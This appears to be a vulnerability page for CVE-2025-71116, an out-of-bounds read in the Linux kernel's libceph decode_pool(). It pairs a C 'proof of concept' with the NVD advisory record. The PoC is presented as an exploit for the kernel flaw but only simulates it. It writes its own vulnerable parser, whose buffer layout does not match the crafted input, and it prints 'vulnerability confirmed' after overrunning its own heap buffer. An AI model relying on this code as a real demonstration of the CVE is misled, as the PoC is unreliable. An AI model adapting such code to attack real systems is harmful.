CVE-2025-71116

/* * PoC for CVE-2025-71116: libceph decode_pool() out-of-bounds read * This PoC demonstrates the vulnerability by creating a maliciously * corrupted osdmap with undersized pool envelope length. * * Note: This requires libceph development headers and kernel access. * For demonstration purposes only. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> /* Simulated ceph osdmap structure */ struct ceph_osdmap { uint32_t epoch; uint32_t pool_max; uint8_t *data; size_t data_len; }; /* Malicious pool encoding with undersized length */ static uint8_t* create_malicious_osdmap(size_t *out_len) { /* Structure: [type][len][pool_id][undersized_envelope_len][corrupted_data...] */ size_t total = 1 + 4 + 4 + 4 + 256; uint8_t *buf = malloc(total); size_t pos = 0; /* CEPH_TYPE_POOL (0x4) */ buf[pos++] = 0x4; /* Pool ID */ buf[pos++] = 0x01; buf[pos++] = 0x00; buf[pos++] = 0x00; buf[pos++] = 0x00; /* Maliciously undersized envelope length (should be much larger) */ buf[pos++] = 0x08; /* Set to 8, but actual data needs more */ buf[pos++] = 0x00; buf[pos++] = 0x00; buf[pos++] = 0x00; /* Fill with data that will trigger OOB read */ memset(buf + pos, 0x41, 256); *out_len = total; return buf; } /* Simulated vulnerable decode_pool function */ int decode_pool_vulnerable(uint8_t *data, size_t len) { size_t pos = 0; uint32_t envelope_len; /* Read envelope length (attacker controlled) */ if (pos + 4 > len) return -1; memcpy(&envelope_len, data + pos, 4); pos += 4; /* Vulnerable: Only bounds check based on attacker-controlled length */ if (pos + envelope_len > len) { /* This check is insufficient */ return -1; } /* Try to decode fields - OOB read occurs here */ for (int i = 0; i < envelope_len + 100; i++) { /* Access beyond envelope_len causes OOB */ volatile uint8_t val = data[pos + i]; printf("Reading byte at offset %zu: 0x%02x\n", pos + i, val); } return 0; } int main(int argc, char *argv[]) { printf("CVE-2025-71116 PoC - libceph decode_pool OOB Read\n"); printf("================================================\n\n"); size_t osdmap_len; uint8_t *malicious_osdmap = create_malicious_osdmap(&osdmap_len); printf("Created malicious osdmap, length: %zu bytes\n", osdmap_len); printf("Attempting to trigger OOB read in decode_pool()...\n\n"); int result = decode_pool_vulnerable(malicious_osdmap, osdmap_len); if (result == 0) { printf("\nOOB read triggered - vulnerability confirmed\n"); } else { printf("\nFailed to trigger vulnerability\n"); } free(malicious_osdmap); return 0; }

{"cve": {"id": "CVE-2025-71116", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.277", "lastModified": "2026-03-25T18:59:53.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nlibceph: hacer decode_pool() más resistente contra osdmaps corruptos\n\nSi el osdmap está (maliciosamente) corrupto de tal manera que la longitud codificada del envoltorio ceph_pg_pool es menor de lo que se espera para una versión de codificación particular, pueden producirse lecturas fuera de límites porque la única comprobación de límites que existe se basa en ese valor de longitud.\n\nEste parche añade comprobaciones de límites explícitas para cada campo que se decodifica o se omite."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9.1", "versionEndExcluding": "5.10.248", "matchCriteriaId": "32B8D212-DEC8-414B-8730-B7E649522F2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": "C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:-:*:*:*:*:*:*", "matchCriteriaId": "526A1838-B777-4270-82B2-E8BC398CB046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/145d140abda80e33331c5781d6603014fa75d258", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2acb8517429ab42146c6c0ac1daed1f03d2fd125", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d0d8c292531fe356c4e94dcfdf7d7212aca9957 ... (truncated)